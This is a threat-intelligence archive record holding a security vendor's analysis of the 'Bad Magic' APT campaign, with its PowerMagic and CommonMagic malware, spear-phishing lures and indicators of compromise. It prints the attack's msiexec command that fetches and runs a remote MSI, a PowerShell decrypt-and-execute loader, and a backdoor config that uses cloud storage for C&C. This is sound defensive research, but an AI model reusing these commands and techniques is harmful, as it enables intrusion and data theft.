{
	"id": "1d9768f1-83b2-441a-a706-fc52fd852305",
	"created_at": "2026-04-06T00:15:31.127639Z",
	"updated_at": "2026-04-10T03:25:40.963919Z",
	"deleted_at": null,
	"sha1_hash": "df3c957abf55f1dfec748041bb0cd4ba10bcf8b6",
	"title": "Bad magic: new APT found in the area of Russo-Ukrainian conflict",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1492130,
	"plain_text": "Bad magic: new APT found in the area of Russo-Ukrainian conflict\r\nBy Leonid Bezvershenko\r\nPublished: 2023-03-21 · Archived: 2026-04-05 15:18:56 UTC\r\nSince the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.\r\nIn October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:\r\n- A decoy document (we discovered PDF, XLSX and DOCX versions)\r\n- A malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened\r\n[Figure: Malicious ZIP archive]\r\nhttps://securelist.com/bad-magic-apt/109087/\r\nPage 1 of 10\r\n[Figure: Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)]\r\nIn several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. For example, one archive contained an LNK file named “Приказ Минфина ДНР № 176.pdf.lnk” (Ministry of Finance Decree No. 176), and the decoy document explicitly referenced it by name in the text.\r\n[Figure: Decoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance Decree No. 176)]\r\nThe ZIP files were downloaded from various locations hosted on two domains: webservice-srv[.]online and webservice-srv1[.]online.\r\nKnown attachment names, redacted to remove personal information:\r\nMD5 (name) | First detection\r\n0a95a985e6be0918fdb4bfabf0847b5a (новое отмена решений уик 288.zip) | 2021-09-22 13:47\r\necb7af5771f4fe36a3065dc4d5516d84 (внесение_изменений_в_отдельные_законодательные_акты_рф.zip) | 2022-04-28 07:36\r\n765f45198cb8039079a28289eab761c5 (гражданин рб (redacted) .zip) | 2022-06-06 11:40\r\nebaf3c6818bfc619ca2876abd6979f6d (цик 3638.zip) | 2022-08-05 08:39\r\n1032986517836a8b1f87db954722a33f (сз 14-1519 от 10.08.22.zip) | 2022-08-12 10:21\r\n1de44e8da621cdeb62825d367693c75e (приказ минфина днр № 176.zip) | 2022-09-23 08:10\r\nWhen the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that leads to the infection of the computer with a previously unseen malicious framework that we named CommonMagic. The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.\r\nInfection chain\r\n[Figure: Infection chain]\r\nInstallation workflow\r\nThe malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable:\r\n%WINDIR%\\System32\\msiexec.exe /i http://185.166.217[.]184/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA/attachment.msi /quiet\r\nThe MSI file is effectively a dropper package, containing an encrypted next-stage payload (service_pack.dat), a dropper script (runservice_pack.vbs) and a decoy document that is supposed to be displayed to the victim.\r\n[Figure: Files contained in attachment.msi]\r\nThe encrypted payload and the decoy document are written to the folder named %APPDATA%\\WinEventCom. The VBS dropper script is, in turn, a wrapper for launching an embedded PowerShell script that decrypts the next stage using a simple one-byte XOR, launches it and deletes it from disk.\r\nDecryption of service_pack.dat:\r\n$inst=\"$env:APPDATA\\WinEventCom\\service_pack.dat\";\r\nif (!(Test-Path $inst)){\r\n    return;\r\n}\r\n$binst=[System.IO.File]::ReadAllBytes($inst);\r\n$xbinst=New-Object Byte[] $binst.Count;\r\nfor ($i=0;$i -lt $binst.Count;$i++) {\r\n    $xbinst[$i]=$binst[$i] -bxor 0x13;\r\n    $xbinst[$i]=$binst[$i] -bxor 0x55;\r\n    $xbinst[$i]=$binst[$i] -bxor 0xFF;\r\n    $xbinst[$i]=$binst[$i] -bxor 0xFF;\r\n};\r\nTry {\r\n    [System.Text.Encoding]::ASCII.GetString($xbinst)|iex;\r\n}\r\nCatch {};\r\nStart-Sleep 3;\r\nRemove-Item -Path $inst -Force\r\nThe next-stage script finalizes the installation: it opens the decoy document to display it to the user, writes two files named config and manutil.vbs to %APPDATA%\\WinEventCom, and creates a Task Scheduler job named WindowsActiveXTaskTrigger to execute the command wscript.exe %APPDATA%\\WinEventCom\\manutil.vbs every day.\r\nThe PowerMagic backdoor\r\nThe script manutil.vbs, which is dropped by the initial package, is a loader for a previously unknown backdoor written in PowerShell that we named PowerMagic. The main body of the backdoor is read from the file %APPDATA%\\WinEventCom\\config and decrypted with a simple XOR (key: 0x10).\r\nSnippet of PowerMagic’s code containing the “powermagic” string:\r\n$AppDir='powermagic';\r\n$ClinetDir='client';\r\n$ClinetTaskDir='task';\r\n$ClinetResultDir='result';\r\n$ClientToken=redacted\r\n$dbx_up='https://content.dropboxapi.com/2/files/upload';\r\n$dbx_down = 'https://content.dropboxapi.com/2/files/download';\r\nWhen started, the backdoor creates a mutex named WinEventCom. Then, it enters an infinite loop communicating with its C&C server, receiving commands and uploading results in response. It uses OneDrive and Dropbox folders as transport, and OAuth refresh tokens as credentials.\r\nEvery minute the backdoor performs the following actions:\r\n1. Modifies the heartbeat file located at /$AppDir/$ClientDir/<machine UID> (the values of the $AppDir and $ClientDir PowerShell variables may differ between samples). The contents of this file consist of the backdoor PID and a number incremented by one with each file modification.\r\n2. Downloads commands that are stored as a file in the /$AppDir/$ClientTaskDir directory.\r\n3. Executes every command as a PowerShell script.\r\n4. Uploads the output of the executed PowerShell command to the cloud storage, placing it in the /$AppDir/$ClientResultDir/<victim machine UUID>.<timestamp> file.\r\nThe CommonMagic framework\r\nAs it turned out, PowerMagic was not the only malicious toolkit used by the actor. All the victims of PowerMagic were also infected with a more complicated, previously unseen, modular malicious framework that we named CommonMagic. This framework was deployed after initial infection with the PowerShell backdoor, leading us to believe that CommonMagic is deployed via PowerMagic.\r\nThe CommonMagic framework consists of several executable modules, all stored in the directory C:\\ProgramData\\CommonCommand. Modules start as standalone executable files and communicate via named pipes. There are dedicated modules for interaction with the C&C server, encryption and decryption of the C&C traffic and various malicious actions.\r\nThe diagram below illustrates the architecture of the framework.\r\n[Figure: Framework architecture]\r\nNetwork communication\r\nThe framework uses OneDrive remote folders as a transport. It utilizes the Microsoft Graph API using an OAuth refresh token embedded into the module binary for authentication. The RapidJSON library is used for parsing JSON objects returned by the Graph API.\r\nA dedicated heartbeat thread updates the remote file <victim ID>/S/S.txt every five minutes with the local timestamp of the victim.\r\nThen, in separate threads, the network communication module downloads new executable modules from the directory <victim ID>/M and uploads the results of their execution to the directory <victim ID>/R.\r\nThe data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source library. By default, this library uses the seven-byte sequence “RC5SIMP” at the beginning of the encrypted sequence, but the developers of the backdoor changed it to “Hwo7X8p”. Encryption is implemented in a separate process, communicating over the pipes named \\\\.\\pipe\\PipeMd and \\\\.\\pipe\\PipeCrDtMd.\r\nPlugins\r\nSo far, we have discovered two plugins implementing the malicious business logic. They are located in the directory C:\\ProgramData\\CommonCommand\\Other.\r\n- Screenshot (S.exe): takes screenshots every three seconds using the GDI API\r\n- USB (U.exe): collects the contents of the files with the following extensions from connected USB devices: .doc, .docx, .xls, .xlsx, .rtf, .odt, .ods, .zip, .rar, .txt, .pdf.\r\nTo be continued\r\nSo far, we have found no direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and our investigation continues. We therefore believe that further discoveries may reveal additional information about this malware and the threat actor behind it.\r\nCommonMagic indicators of compromise\r\nLure archives\r\n0a95a985e6be0918fdb4bfabf0847b5a новое отмена решений уик 288.zip (new cancellation of resolution local election committee 288.zip)\r\necb7af5771f4fe36a3065dc4d5516d84 внесение_изменений_в_отдельные_законодательные_акты_рф.zip (making changes to several russian federation laws.zip)\r\n765f45198cb8039079a28289eab761c5 гражданин рб (redacted) .zip (citizen of republic of belarus (redacted).zip)\r\nebaf3c6818bfc619ca2876abd6979f6d цик 3638.zip (central election committee 3638.zip)\r\n1032986517836a8b1f87db954722a33f сз 14-1519 от 10.08.22.zip (memo 14-1519 dated 10.08.22.zip)\r\n1de44e8da621cdeb62825d367693c75e приказ минфина днр № 176.zip (dpr ministry of finance order #176.zip)\r\nPowerMagic installer\r\nfee3db5db8817e82b1af4cedafd2f346 attachment.msi\r\nPowerMagic dropper\r\nbec44b3194c78f6e858b1768c071c5db service_pack.dat\r\nPowerMagic loader\r\n8c2f5e7432f1e6ad22002991772d589b manutil.vbs\r\nPowerMagic backdoor\r\n1fe3a2502e330432f3cf37ca7acbffac\r\nCommonMagic loader\r\nce8d77af445e3a7c7e56a6ea53af8c0d All.exe\r\nCommonMagic cryptography module\r\n9e19fe5c3cf3e81f347dd78cf3c2e0c2 Clean.exe\r\nCommonMagic network communication module\r\n7c0e5627fd25c40374bc22035d3fadd8 Overall.exe\r\nDistribution servers\r\nwebservice-srv[.]online\r\nwebservice-srv1[.]online\r\n185.166.217[.]184\r\nSource: https://securelist.com/bad-magic-apt/109087/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://securelist.com/bad-magic-apt/109087/"
	],
	"report_names": [
		"109087"
	],
	"threat_actors": [
		{
			"id": "3f918a1b-2f20-4f3f-ae16-31e83d9d91d9",
			"created_at": "2023-06-23T02:04:34.088425Z",
			"updated_at": "2026-04-10T02:00:04.573175Z",
			"deleted_at": null,
			"main_name": "Bad Magic",
			"aliases": [
				"Bad Magic",
				"CloudWizard",
				"RedStinger"
			],
			"source_name": "ETDA:Bad Magic",
			"tools": [
				"CommonMagic",
				"PowerMagic"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ff5a7bd9-75a5-43fe-ba4c-27dab43e1f61",
			"created_at": "2023-11-07T02:00:07.086058Z",
			"updated_at": "2026-04-10T02:00:03.403516Z",
			"deleted_at": null,
			"main_name": "RedStinger",
			"aliases": [
				"Bad Magic"
			],
			"source_name": "MISPGALAXY:RedStinger",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434531,
	"ts_updated_at": 1775791540,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/df3c957abf55f1dfec748041bb0cd4ba10bcf8b6.pdf",
		"text": "https://archive.orkl.eu/df3c957abf55f1dfec748041bb0cd4ba10bcf8b6.txt",
		"img": "https://archive.orkl.eu/df3c957abf55f1dfec748041bb0cd4ba10bcf8b6.jpg"
	}
}